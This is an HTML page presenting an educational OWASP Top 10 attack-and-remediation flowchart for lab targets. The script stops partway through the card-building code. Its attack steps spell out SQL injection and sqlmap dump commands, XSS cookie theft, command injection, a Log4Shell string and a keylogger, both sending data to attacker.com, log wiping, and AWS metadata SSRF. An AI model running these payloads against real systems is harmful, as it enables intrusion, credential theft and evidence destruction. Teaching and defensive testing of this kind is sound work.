index.html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>OWASP Top 10 — Attack & Remediation Flowchart</title>
<style>
  * { box-sizing: border-box; margin: 0; padding: 0; }
  body { font-family: 'Segoe UI', Arial, sans-serif; background: #0a0a0f; color: #e0e0e0; min-height: 100vh; }

  .header {
    background: linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%);
    padding: 30px 40px;
    border-bottom: 3px solid #e94560;
    text-align: center;
  }
  .header h1 { font-size: 2rem; color: #fff; letter-spacing: 2px; }
  .header p { color: #a0a0b0; margin-top: 8px; font-size: 0.95rem; }
  .header .badge { display: inline-block; background: #e94560; color: white; padding: 4px 14px; border-radius: 20px; font-size: 0.75rem; margin-top: 10px; letter-spacing: 1px; }

  .legend {
    display: flex; gap: 20px; flex-wrap: wrap; justify-content: center;
    padding: 16px 40px; background: #111120; border-bottom: 1px solid #222240;
  }
  .legend-item { display: flex; align-items: center; gap: 8px; font-size: 0.8rem; color: #aaa; }
  .legend-dot { width: 14px; height: 14px; border-radius: 3px; }

  .container { padding: 30px 20px; max-width: 1400px; margin: 0 auto; }

  .owasp-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(380px, 1fr)); gap: 30px; }

  .vuln-card {
    background: #111120;
    border: 1px solid #222240;
    border-radius: 12px;
    overflow: hidden;
    transition: transform 0.2s, box-shadow 0.2s;
  }
  .vuln-card:hover { transform: translateY(-4px); box-shadow: 0 12px 40px rgba(233,69,96,0.15); }

  .card-header {
    padding: 16px 20px;
    display: flex; align-items: center; gap: 14px;
    cursor: pointer; user-select: none;
  }
  .card-header .num {
    width: 40px; height: 40px; border-radius: 50%;
    display: flex; align-items: center; justify-content: center;
    font-weight: 900; font-size: 1rem; flex-shrink: 0;
  }
  .card-header .title-block { flex: 1; }
  .card-header h3 { font-size: 0.95rem; color: #fff; }
  .card-header .cve { font-size: 0.72rem; color: #888; margin-top: 2px; }
  .card-header .sev-badge {
    font-size: 0.7rem; font-weight: 700; padding: 3px 10px;
    border-radius: 12px; letter-spacing: 0.5px; flex-shrink: 0;
  }
  .toggle-icon { color: #888; font-size: 1.1rem; flex-shrink: 0; transition: transform 0.3s; }
  .card-body { display: none; padding: 0 20px 20px; }
  .card-body.open { display: block; }
  .toggle-icon.open { transform: rotate(180deg); }

  /* Flowchart styles */
  .flowchart { position: relative; }

  .flow-step {
    position: relative;
    display: flex;
    align-items: flex-start;
    gap: 14px;
    margin-bottom: 6px;
  }

  .flow-line {
    display: flex;
    flex-direction: column;
    align-items: center;
    flex-shrink: 0;
    width: 32px;
  }

  .flow-node {
    width: 32px; height: 32px;
    border-radius: 50%;
    display: flex; align-items: center; justify-content: center;
    font-size: 0.75rem; font-weight: 700; flex-shrink: 0;
    border: 2px solid transparent;
    z-index: 1;
  }

  .flow-connector {
    width: 2px;
    flex: 1;
    min-height: 12px;
    background: #333355;
    margin: 0 auto;
  }

  .flow-content {
    flex: 1;
    padding: 10px 14px;
    border-radius: 8px;
    margin-bottom: 8px;
    border-left: 3px solid transparent;
  }

  .flow-content h4 { font-size: 0.8rem; font-weight: 700; margin-bottom: 4px; }
  .flow-content p { font-size: 0.75rem; color: #aaa; line-height: 1.5; }
  .flow-content code {
    display: inline-block; background: #0a0a1a; color: #50fa7b;
    padding: 2px 6px; border-radius: 4px; font-size: 0.7rem;
    font-family: 'Courier New', monospace; margin-top: 4px;
    word-break: break-all;
  }
  .flow-content .tool-tag {
    display: inline-block; background: #1a1a3e; color: #8be9fd;
    padding: 2px 8px; border-radius: 10px; font-size: 0.68rem;
    margin: 2px 2px 0 0; border: 1px solid #2a2a5e;
  }

  /* Step types */
  .step-recon .flow-node { background: #2a1a4e; border-color: #9b59b6; color: #9b59b6; }
  .step-recon .flow-content { background: #1a0d2e; border-color: #9b59b6; }
  .step-recon .flow-content h4 { color: #9b59b6; }

  .step-attack .flow-node { background: #4e1a1a; border-color: #e94560; color: #e94560; }
  .step-attack .flow-content { background: #2e0d0d; border-color: #e94560; }
  .step-attack .flow-content h4 { color: #e94560; }

  .step-exploit .flow-node { background: #4e2e0a; border-color: #f39c12; color: #f39c12; }
  .step-exploit .flow-content { background: #2e1a05; border-color: #f39c12; }
  .step-exploit .flow-content h4 { color: #f39c12; }

  .step-impact .flow-node { background: #1a0a0a; border-color: #ff4444; color: #ff4444; }
  .step-impact .flow-content { background: #1a0505; border-color: #ff4444; }
  .step-impact .flow-content h4 { color: #ff4444; }

  .step-fix .flow-node { background: #0a2e1a; border-color: #2ecc71; color: #2ecc71; }
  .step-fix .flow-content { background: #051a0d; border-color: #2ecc71; }
  .step-fix .flow-content h4 { color: #2ecc71; }

  .step-test .flow-node { background: #0a1a2e; border-color: #3498db; color: #3498db; }
  .step-test .flow-content { background: #050d1a; border-color: #3498db; }
  .step-test .flow-content h4 { color: #3498db; }

  .divider {
    display: flex; align-items: center; gap: 10px;
    margin: 16px 0 12px;
  }
  .divider-line { flex: 1; height: 1px; background: #222240; }
  .divider-label {
    font-size: 0.7rem; font-weight: 700; letter-spacing: 1px;
    padding: 3px 12px; border-radius: 10px;
  }
  .divider-attack .divider-label { background: #2e0d0d; color: #e94560; border: 1px solid #e94560; }
  .divider-fix .divider-label { background: #051a0d; color: #2ecc71; border: 1px solid #2ecc71; }

  /* severity colors */
  .sev-critical { background: #e94560; color: white; }
  .sev-high { background: #e67e22; color: white; }
  .sev-medium { background: #f39c12; color: #1a1a1a; }
  .sev-low { background: #3498db; color: white; }

  .num-critical { background: #e94560; color: white; }
  .num-high { background: #e67e22; color: white; }
  .num-medium { background: #f39c12; color: #1a1a1a; }
  .num-low { background: #3498db; color: white; }

  /* dummy target box */
  .dummy-target {
    background: linear-gradient(135deg, #1a1a2e, #16213e);
    border: 2px dashed #3498db;
    border-radius: 12px;
    padding: 20px 30px;
    margin-bottom: 30px;
    text-align: center;
  }
  .dummy-target h2 { color: #3498db; font-size: 1.1rem; margin-bottom: 10px; }
  .dummy-target p { color: #888; font-size: 0.85rem; }
  .dummy-target .env-grid { display: flex; flex-wrap: wrap; gap: 10px; justify-content: center; margin-top: 12px; }
  .env-item { background: #111130; border: 1px solid #2a2a5e; padding: 6px 14px; border-radius: 8px; font-size: 0.75rem; color: #8be9fd; }

  .section-title {
    color: #fff;
    font-size: 1.2rem;
    margin: 10px 0 20px;
    padding-bottom: 10px;
    border-bottom: 2px solid #222240;
    display: flex; align-items: center; gap: 10px;
  }
  .section-title span { color: #e94560; }

  footer {
    text-align: center; padding: 20px;
    color: #555; font-size: 0.75rem;
    border-top: 1px solid #1a1a2e;
    margin-top: 40px;
  }
</style>
</head>
<body>

<div class="header">
  <h1>⚔ OWASP TOP 10 — ATTACK & REMEDIATION FLOWCHART</h1>
  <p>Practical attack methodology on dummy/lab environments with step-by-step remediation</p>
  <div class="badge">FOR AUTHORIZED TESTING ONLY — EDUCATIONAL PURPOSE</div>
</div>

<div class="legend">
  <div class="legend-item"><div class="legend-dot" style="background:#9b59b6"></div> Reconnaissance</div>
  <div class="legend-item"><div class="legend-dot" style="background:#e94560"></div> Attack Step</div>
  <div class="legend-item"><div class="legend-dot" style="background:#f39c12"></div> Exploit</div>
  <div class="legend-item"><div class="legend-dot" style="background:#ff4444"></div> Impact</div>
  <div class="legend-item"><div class="legend-dot" style="background:#2ecc71"></div> Remediation</div>
  <div class="legend-item"><div class="legend-dot" style="background:#3498db"></div> Verify Fix</div>
</div>

<div class="container">

  <!-- Dummy Target Setup -->
  <div class="dummy-target">
    <h2>🎯 Recommended Dummy / Lab Targets for Practice</h2>
    <p>Always practice on intentionally vulnerable applications. Never test on live websites without written permission.</p>
    <div class="env-grid">
      <div class="env-item">🐐 DVWA (Damn Vulnerable Web App)</div>
      <div class="env-item">🧃 OWASP Juice Shop</div>
      <div class="env-item">🕸 WebGoat</div>
      <div class="env-item">🔓 bWAPP</div>
      <div class="env-item">🐝 HackTheBox</div>
      <div class="env-item">🏴 TryHackMe</div>
      <div class="env-item">🐳 Docker: vulhub</div>
    </div>
  </div>

  <div class="section-title"><span>⚡</span> Click each vulnerability card to expand the full attack flowchart</div>

  <div class="owasp-grid" id="vulnGrid"></div>

</div>

<footer>⚠ This flowchart is for educational and authorized penetration testing only. Unauthorized attacks are illegal. Always get written permission before testing.</footer>

<script>
const vulns = [
  {
    id: "A01",
    title: "A01 — Broken Access Control",
    cve: "CVE-2021-41773 | CWE-284",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify protected endpoints and user roles", tools: ["Burp Suite", "FFUF", "DirBuster"], code: "ffuf -u http://target/FUZZ -w /wordlists/common.txt" },
      { type: "attack", icon: "⚔", title: "Forced Browsing", desc: "Try to access admin/restricted URLs directly without authentication", tools: ["Browser", "Burp Repeater"], code: "GET /admin/users HTTP/1.1\nHost: target.com" },
      { type: "attack", icon: "⚔", title: "IDOR — Insecure Direct Object Reference", desc: "Manipulate object IDs in requests to access other users' data", tools: ["Burp Suite", "Intruder"], code: "GET /api/orders/1337 → change to /api/orders/1338" },
      { type: "attack", icon: "⚔", title: "Privilege Escalation", desc: "Change role parameter in request body or cookie", code: "POST /profile\nbody: {\"role\": \"admin\", \"id\": 5}" },
      { type: "exploit", icon: "💥", title: "Horizontal & Vertical Escalation", desc: "Access another user's account (horizontal) or elevate to admin (vertical)", code: "Cookie: user_id=2 → user_id=1 (admin)" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Unauthorized data access, account takeover, full admin control, data deletion" },
      { type: "fix", icon: "🛡", title: "Remediation", desc: "Enforce server-side authorization checks on every request. Deny by default.", code: "if (!user.hasRole('admin')) return 403;" },
      { type: "fix", icon: "🛡", title: "Implement RBAC", desc: "Use Role-Based Access Control. Log all access control failures.", code: "app.use(rbacMiddleware({ role: 'admin' }));" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-test all restricted endpoints as different roles. Use Burp to confirm 403 responses.", tools: ["Burp Suite", "OWASP ZAP"] },
    ]
  },
  {
    id: "A02",
    title: "A02 — Cryptographic Failures",
    cve: "CVE-2021-3449 | CWE-327",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Check SSL/TLS version, identify sensitive data in transit and at rest", tools: ["SSLScan", "Nmap", "Burp Suite"], code: "sslscan target.com\nnmap --script ssl-enum-ciphers target.com" },
      { type: "attack", icon: "⚔", title: "Intercept HTTP Traffic", desc: "Look for sensitive data (passwords, tokens) sent over HTTP instead of HTTPS", tools: ["Burp Suite", "Wireshark"], code: "Set Burp as proxy → look for plaintext credentials" },
      { type: "attack", icon: "⚔", title: "Check Weak Encryption", desc: "Identify MD5/SHA1 password hashing, weak ciphers, or hardcoded keys in source", code: "grep -r 'md5\\|sha1\\|password' ./source/" },
      { type: "exploit", icon: "💥", title: "Decrypt Weak Hashes", desc: "Use rainbow tables or hashcat to crack MD5/SHA1 password hashes", tools: ["Hashcat", "CrackStation"], code: "hashcat -m 0 hash.txt rockyou.txt\n# -m 0 = MD5" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Exposed passwords, stolen credit cards, PII data breach, regulatory fines" },
      { type: "fix", icon: "🛡", title: "Use Strong Hashing", desc: "Use bcrypt, Argon2, or scrypt for passwords. Never MD5/SHA1.", code: "const hash = await bcrypt.hash(password, 12);" },
      { type: "fix", icon: "🛡", title: "Enforce HTTPS + HSTS", desc: "Redirect all HTTP to HTTPS. Add HSTS header with long max-age.", code: "Strict-Transport-Security: max-age=31536000; includeSubDomains" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Run SSLLabs SSL test. Confirm all passwords stored as bcrypt.", tools: ["SSL Labs", "SSLScan"] },
    ]
  },
  {
    id: "A03",
    title: "A03 — Injection (SQLi, XSS, Command)",
    cve: "CVE-2021-44228 | CWE-89",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Find all input fields, URL parameters, and headers that get processed by the server", tools: ["Burp Spider", "FFUF", "Nikto"], code: "nikto -h http://target.com" },
      { type: "attack", icon: "⚔", title: "SQL Injection Test", desc: "Inject SQL payloads into login forms, search fields, URL params", tools: ["SQLMap", "Burp Suite"], code: "' OR '1'='1\n' OR 1=1--\n\" OR \"1\"=\"1" },
      { type: "attack", icon: "⚔", title: "SQLMap Automated Scan", desc: "Run SQLMap on identified injection points to dump the database", tools: ["SQLMap"], code: "sqlmap -u 'http://target.com/item?id=1' --dbs\nsqlmap -u 'http://target.com/item?id=1' -D shopdb --tables --dump" },
      { type: "attack", icon: "⚔", title: "XSS — Cross Site Scripting", desc: "Inject JavaScript into input fields that gets rendered in the browser", code: "&lt;script&gt;alert('XSS')&lt;/script&gt;\n&lt;img src=x onerror=alert(document.cookie)&gt;" },
      { type: "attack", icon: "⚔", title: "Command Injection", desc: "Inject OS commands via input fields that get executed on the server", code: "127.0.0.1; cat /etc/passwd\n127.0.0.1 && whoami" },
      { type: "exploit", icon: "💥", title: "Dump Database / Steal Cookies", desc: "Extract user credentials, PII, payment data from the database", tools: ["SQLMap", "Burp"], code: "sqlmap ... --dump -T users -C username,password" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Full database compromise, account takeover, remote code execution, defacement" },
      { type: "fix", icon: "🛡", title: "Use Parameterized Queries", desc: "Never concatenate user input into SQL. Use prepared statements.", code: "db.query('SELECT * FROM users WHERE id = ?', [userId]);" },
      { type: "fix", icon: "🛡", title: "Sanitize & Encode Output", desc: "Encode all output for XSS. Use Content-Security-Policy header.", code: "const safe = DOMPurify.sanitize(userInput);\nres.setHeader('Content-Security-Policy', \"default-src 'self'\");" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run SQLMap — should get no injection points. Test XSS payloads manually.", tools: ["SQLMap", "OWASP ZAP"] },
    ]
  },
  {
    id: "A04",
    title: "A04 — Insecure Design",
    cve: "CVE-2022-22965 | CWE-306",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Map application workflows, business logic, and identify missing threat model controls", tools: ["Burp Suite", "Manual Review"], code: "Analyze password reset flow, shopping cart logic, coupon codes" },
      { type: "attack", icon: "⚔", title: "Business Logic Abuse", desc: "Apply same coupon code multiple times. Add negative quantities to cart.", code: "POST /cart/update\nbody: {quantity: -1, price: 99.99}" },
      { type: "attack", icon: "⚔", title: "Race Condition Attack", desc: "Send multiple simultaneous requests to exploit race conditions in business logic", tools: ["Burp Turbo Intruder", "Python requests"], code: "# Send 50 concurrent coupon redemption requests\nimport threading\nthreading.Thread(target=redeem).start()" },
      { type: "attack", icon: "⚔", title: "Password Reset Abuse", desc: "Test if reset tokens expire, can be reused, or are predictable", code: "Request reset → use token after 24hrs\nRequest reset twice → use first token" },
      { type: "exploit", icon: "💥", title: "Bypass Business Rules", desc: "Get items for free, reuse discounts, bypass payment, access locked features", code: "Cart total becomes negative → store owes attacker money" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Financial loss, free product acquisition, privilege bypass, data integrity violations" },
      { type: "fix", icon: "🛡", title: "Server-Side Business Logic", desc: "Validate all business rules server-side. Never trust client-submitted prices.", code: "// Always recalculate price from database\nconst price = await Product.findById(id).price;" },
      { type: "fix", icon: "🛡", title: "Rate Limiting & Token Expiry", desc: "Expire reset tokens after 15 mins. Limit coupon use to 1 per user. Add rate limiting.", code: "if (token.createdAt < Date.now() - 900000) return 410;" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Try all business logic abuse scenarios again. Confirm server rejects invalid states." },
    ]
  },
  {
    id: "A05",
    title: "A05 — Security Misconfiguration",
    cve: "CVE-2021-41773 | CWE-16",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Scan for open ports, exposed admin panels, default credentials, verbose errors", tools: ["Nmap", "Shodan", "Nikto"], code: "nmap -sV -sC -p- target.com\nnikto -h http://target.com" },
      { type: "attack", icon: "⚔", title: "Default Credentials", desc: "Try default username/password combos on admin panels", tools: ["Burp Intruder", "Hydra"], code: "admin:admin, admin:password\nroot:root, admin:1234" },
      { type: "attack", icon: "⚔", title: "Directory Listing & Exposed Files", desc: "Check for open directory listings, .git folders, .env files, backup files", tools: ["FFUF", "DirBuster"], code: "ffuf -u http://target/FUZZ -w wordlist.txt\nCheck: /.env, /.git, /backup.zip, /phpinfo.php" },
      { type: "attack", icon: "⚔", title: "Verbose Error Messages", desc: "Trigger errors to extract stack traces, database names, file paths", code: "Submit invalid input → look for error messages\nGET /item?id=abc → SQL error reveals DB structure" },
      { type: "exploit", icon: "💥", title: "Access Admin Panel / Source Code", desc: "Use found credentials or exposed files to gain admin access or read sensitive configs", code: "curl http://target.com/.env\n# Reveals: DB_PASSWORD=secret123, API_KEY=..." },
      { type: "impact", icon: "☠", title: "Impact", desc: "Full server compromise, credential theft, data exfiltration, ransomware deployment" },
      { type: "fix", icon: "🛡", title: "Harden Configuration", desc: "Remove default accounts. Disable directory listing. Hide server version headers.", code: "ServerTokens Prod\nServerSignature Off\nOptions -Indexes" },
      { type: "fix", icon: "🛡", title: "Secure Error Handling", desc: "Show generic error pages to users. Log details server-side only.", code: "app.use((err, req, res) => {\n  res.status(500).json({error: 'Internal error'});\n});" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run Nmap and Nikto. Confirm no sensitive files accessible. Test error messages.", tools: ["Nmap", "Nikto", "FFUF"] },
    ]
  },
  {
    id: "A06",
    title: "A06 — Vulnerable & Outdated Components",
    cve: "CVE-2021-44228 (Log4Shell) | CWE-1104",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify technology stack, framework versions, and third-party libraries", tools: ["Wappalyzer", "Retire.js", "Burp"], code: "Check: X-Powered-By header, /package.json, /composer.json" },
      { type: "attack", icon: "⚔", title: "Identify Vulnerable Versions", desc: "Check identified components against known CVE databases", tools: ["CVE Mitre", "Snyk", "OWASP DC"], code: "npm audit\npip-audit\nowasp-dependency-check --project app --scan ./" },
      { type: "attack", icon: "⚔", title: "Exploit Known CVE", desc: "Download and run PoC exploit for identified vulnerable component version", tools: ["Exploit-DB", "Metasploit", "GitHub PoC"], code: "searchsploit jQuery 1.x\nmsfconsole → use exploit/multi/handler" },
      { type: "attack", icon: "⚔", title: "Log4Shell Example (CVE-2021-44228)", desc: "Inject JNDI lookup payload via any user-controlled input field", code: "${jndi:ldap://attacker.com/exploit}\n# Works in: User-Agent, X-Forwarded-For, search boxes" },
      { type: "exploit", icon: "💥", title: "Remote Code Execution", desc: "Malicious LDAP server responds with exploit class → RCE on target server", code: "Target executes attacker's Java class\n→ Reverse shell, data exfiltration" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Remote code execution, full server takeover, lateral movement, ransomware" },
      { type: "fix", icon: "🛡", title: "Update All Dependencies", desc: "Pin to latest secure versions. Use automated dependency scanning in CI/CD.", code: "npm audit fix\nnpm update\npip install --upgrade -r requirements.txt" },
      { type: "fix", icon: "🛡", title: "Automate Vulnerability Scanning", desc: "Add Snyk or OWASP Dependency Check to your build pipeline", code: "# GitHub Actions\n- uses: snyk/actions/node@master\n  env:\n    SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run npm audit / pip-audit — should show 0 vulnerabilities. Retest CVE PoC." },
    ]
  },
  {
    id: "A07",
    title: "A07 — Identification & Authentication Failures",
    cve: "CVE-2020-35196 | CWE-287",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify login page, password reset, session management mechanisms", tools: ["Burp Suite", "Browser DevTools"], code: "Check: session cookie flags, login endpoint, reset flow" },
      { type: "attack", icon: "⚔", title: "Brute Force Login", desc: "Automate password guessing on login endpoint with common wordlists", tools: ["Burp Intruder", "Hydra"], code: "hydra -l admin -P rockyou.txt target.com http-post-form\n'/login:user=^USER^&pass=^PASS^:Invalid'" },
      { type: "attack", icon: "⚔", title: "Session Token Analysis", desc: "Inspect session cookies — check if they're predictable, missing Secure/HttpOnly flags", tools: ["Burp Suite", "JWT.io"], code: "Cookie: session=dXNlcl9pZD0x\n# base64 decode → user_id=1 (predictable!)" },
      { type: "attack", icon: "⚔", title: "JWT Attacks", desc: "Test for alg:none attack, weak secret brute-force on JWT tokens", tools: ["jwt_tool", "hashcat"], code: "# alg:none attack\nheader: {\"alg\":\"none\"}\n# Brute force secret:\njohn --wordlist=rockyou.txt jwt.txt" },
      { type: "attack", icon: "⚔", title: "Password Reset Poisoning", desc: "Modify Host header in password reset request to hijack reset link", code: "POST /reset-password\nHost: attacker.com\n# Reset email contains link to attacker.com" },
      { type: "exploit", icon: "💥", title: "Account Takeover", desc: "Use stolen/guessed credentials or forged session token to log in as victim", code: "Cookie: session=forged_token → logged in as admin" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Account takeover, identity theft, unauthorized transactions, admin access" },
      { type: "fix", icon: "🛡", title: "Implement MFA + Account Lockout", desc: "Add multi-factor auth. Lock accounts after 5 failed attempts. Rate limit login.", code: "if (failedAttempts >= 5) lockAccount(userId, '15min');" },
      { type: "fix", icon: "🛡", title: "Secure Session Management", desc: "Use random 128-bit session IDs. Set Secure, HttpOnly, SameSite=Strict on cookies.", code: "Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict; Path=/" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Try brute force — confirm lockout triggers. Verify JWT rejects alg:none. Check cookie flags." },
    ]
  },
  {
    id: "A08",
    title: "A08 — Software & Data Integrity Failures",
    cve: "CVE-2022-29582 | CWE-494",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify CI/CD pipeline, auto-update mechanisms, external scripts without SRI", tools: ["Browser DevTools", "Burp", "Wappalyzer"], code: "View source → find &lt;script src='external-cdn.com/...'>\nCheck for missing integrity= attribute" },
      { type: "attack", icon: "⚔", title: "Supply Chain Attack Simulation", desc: "In lab: modify a local CDN-served script to inject malicious code", tools: ["Local HTTP server", "Burp"], code: "# Serve malicious script on attacker's CDN\necho 'fetch(\"//attacker.com?c=\"+document.cookie)' > evil.js" },
      { type: "attack", icon: "⚔", title: "CI/CD Pipeline Poisoning", desc: "In lab: inject malicious code into a build script or dependency", tools: ["Git", "npm"], code: "# Malicious npm package\nnpm install malicious-package\n# Runs postinstall hook with exfil code" },
      { type: "attack", icon: "⚔", title: "Insecure Deserialization", desc: "Manipulate serialized objects in cookies or API params to execute code", code: "Cookie: user=O:8:\"UserObj\":1:{s:4:\"role\";s:5:\"admin\";}\n# PHP object injection → privilege escalation" },
      { type: "exploit", icon: "💥", title: "Malicious Code Execution on Client", desc: "Injected script runs in every visitor's browser — steals cookies, keylogging", code: "// Runs on every page load for all visitors\ndocument.onkeydown = (e) => fetch('//attacker.com?k='+e.key);" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Mass credential theft, malware distribution, full supply chain compromise" },
      { type: "fix", icon: "🛡", title: "Add Subresource Integrity (SRI)", desc: "Add integrity hash to all external scripts and stylesheets", code: "&lt;script src='https://cdn.com/lib.js'\n  integrity='sha384-HASH'\n  crossorigin='anonymous'>&lt;/script&gt;" },
      { type: "fix", icon: "🛡", title: "Secure CI/CD Pipeline", desc: "Pin dependency versions. Sign commits. Use dependency review in PRs.", code: "# package.json — use exact versions\n\"dependencies\": { \"express\": \"4.18.2\" }\n# Not: \"^4.18.2\" (allows updates)" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Modify external script — browser should block load with SRI error in console." },
    ]
  },
  {
    id: "A09",
    title: "A09 — Security Logging & Monitoring Failures",
    cve: "CVE-2021-44832 | CWE-778",
    sev: "medium",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Test if failed logins, access control violations, and errors are being logged and alerted", tools: ["Burp Suite", "Manual Testing"], code: "Attempt 100 failed logins → check if any alert fires" },
      { type: "attack", icon: "⚔", title: "Login Brute Force Without Detection", desc: "Run hundreds of login attempts — does the app detect, alert, or block?", tools: ["Burp Intruder", "Hydra"], code: "# 500 login attempts with no rate limit → no alert\nhydra -l admin -P rockyou.txt target.com http-form-post ..." },
      { type: "attack", icon: "⚔", title: "Log Injection", desc: "Inject fake log entries via user-controlled input to cover tracks or confuse SIEM", code: "username: admin\\nINFO 2026-02-20 Login successful for admin\n# Injects fake success log entry" },
      { type: "attack", icon: "⚔", title: "Cover Tracks", desc: "If logs are accessible, delete or modify log files after attack", code: "echo '' > /var/log/apache2/access.log\n# or inject null bytes to corrupt logs" },
      { type: "exploit", icon: "💥", title: "Undetected Long-Term Attack", desc: "Attacker dwells in network for months undetected — exfiltrates data silently", code: "Average breach detection time: 207 days (IBM 2023)" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Undetected breaches, no forensic evidence, regulatory non-compliance, delayed response" },
      { type: "fix", icon: "🛡", title: "Implement Comprehensive Logging", desc: "Log all auth events, access control failures, and input validation errors with timestamps and IP", code: "logger.warn('Failed login: ' + username + ' from ' + ip + ' at ' + Date.now());" },
      { type: "fix", icon: "🛡", title: "Set Up Alerting & SIEM", desc: "Alert on 5+ failed logins/minute. Use tools like ELK Stack, Splunk, or Datadog.", code: "# Alert rule example\nIF failed_logins > 5 IN 60s FROM same_ip\nTHEN alert + block_ip + notify_team" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Trigger 10 failed logins — confirm alert fires. Check logs contain all required fields." },
    ]
  },
  {
    id: "A10",
    title: "A10 — Server-Side Request Forgery (SSRF)",
    cve: "CVE-2021-26084 | CWE-918",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Find features that fetch external URLs: webhooks, image importers, URL previews, PDF generators", tools: ["Burp Suite", "Manual Review"], code: "Look for: ?url=, ?path=, ?redirect=, webhook fields\nImage import from URL features" },
      { type: "attack", icon: "⚔", title: "Basic SSRF Test", desc: "Replace URL parameter with internal IP addresses to probe internal network", tools: ["Burp Suite", "Interactsh"], code: "GET /fetch?url=http://127.0.0.1/admin\nGET /fetch?url=http://169.254.169.254/latest/meta-data/" },
      { type: "attack", icon: "⚔", title: "AWS Metadata SSRF", desc: "In cloud environments, steal IAM credentials from metadata service", code: "GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n→ Returns AWS Access Key + Secret!" },
      { type: "attack", icon: "⚔", title: "SSRF Filter Bypass", desc: "Bypass URL allowlists using IP encoding tricks", code: "http://2130706433/ → 127.0.0.1\nhttp://0x7f000001/ → 127.0.0.1\nhttp://127.1/ → 127.0.0.1\nhttp://attacker.com@internal.host/" },
      { type: "attack", icon: "⚔", title: "Port Scanning via SSRF", desc: "Use SSRF to scan internal network for services", code: "for port in 22 80 443 3306 6379 8080:\n  GET /fetch?url=http://192.168.1.1:{port}" },
      { type: "exploit", icon: "💥", title: "Pivot to Internal Services", desc: "Access internal admin panels, databases, Redis, Elasticsearch that aren't internet-facing", code: "GET /fetch?url=http://internal-admin:8080/\n→ Returns internal admin panel HTML" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Cloud credential theft, internal network access, RCE via internal services, data exfiltration" },
      { type: "fix", icon: "🛡", title: "Allowlist External URLs", desc: "Only allow specific approved domains. Block internal IP ranges completely.", code: "const allowed = ['api.stripe.com', 'cdn.example.com'];\nif (!allowed.includes(new URL(url).hostname)) return 403;" },
      { type: "fix", icon: "🛡", title: "Network Segmentation", desc: "Block server outbound access to 169.254.x.x, 10.x.x.x, 172.16.x.x, 192.168.x.x", code: "# iptables rule\niptables -A OUTPUT -d 169.254.0.0/16 -j DROP\niptables -A OUTPUT -d 192.168.0.0/16 -j DROP" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Test all SSRF bypass techniques. Confirm metadata endpoint blocked. Verify internal IPs rejected." },
    ]
  },
];

const stepIcons = { recon: "🔍", attack: "⚔", exploit: "💥", impact: "☠", fix: "🛡", test: "✅" };
const stepLabels = { recon: "RECON", attack: "ATTACK", exploit: "EXPLOIT", impact: "IMPACT", fix: "FIX", test: "VERIFY" };

function buildCard(vuln) {
  const card = document.createElement('div');
  card.className = 'vuln-card';

  // Header
  const header = document.createElement('div');
  header.className = 'card-header';
  header.style.background = `linear-gradient(135deg, #111120, #1a1a30)`;
  header.style.borderBottom = '1px solid #222240';

  const sevColors = { critical: '#e94560', high: '#e67e22', medium: '#f39c12', low: '#3498db' };
  const color = sevColors[vuln.sev];

  header.innerHTML = `
    <div class="num num-${vuln.sev}" style="background:${color};color:white">${vuln.id}</div>
    <div class="title-block">
      <h3>${vuln.title}</h3>
      <div class="cve">${vuln.cve}</div>
    </div>
    <div class="sev-badge sev-${vuln.sev}">${vuln.sev.toUpperCase()}</div>
    <div class="toggle-icon">▼</div>
  `;

  const body = document.createElement('div');
  body.className = 'card-body';

  // Build flowchart
  let flowHTML = '<div class="flowchart">';

  // Attack section
  flowHTML += `<div class="divider divider-attack"><div class="divider-line"></div><div class="divider-label">⚔ ATTACK FLOW</div><div class="divider-line"></div></div>`;

  const attackSteps = vuln.steps.filter(s => ['recon','attack','exploit','impact'].includes(s.type));
  const fixSteps = vuln.steps.filter(s => ['fix','test'].includes(s.type));

  attackSteps.forEach((step, i) => {
    const isLast = i === attackSteps.length - 1;
    flowHTML += `
      <div class="flow-step step-${step.type}">
        <div class="flow-line">
          <div class="flow-node">${stepIcons[step.type]}</div>
          ${!isLast ? '<div class="flow-connector"></div>' : ''}
        </div>
        <div class="flow-content">
          <h4>${stepLabels[step.type]}: ${step.title}</h4>
          <p>${step.desc}</p>
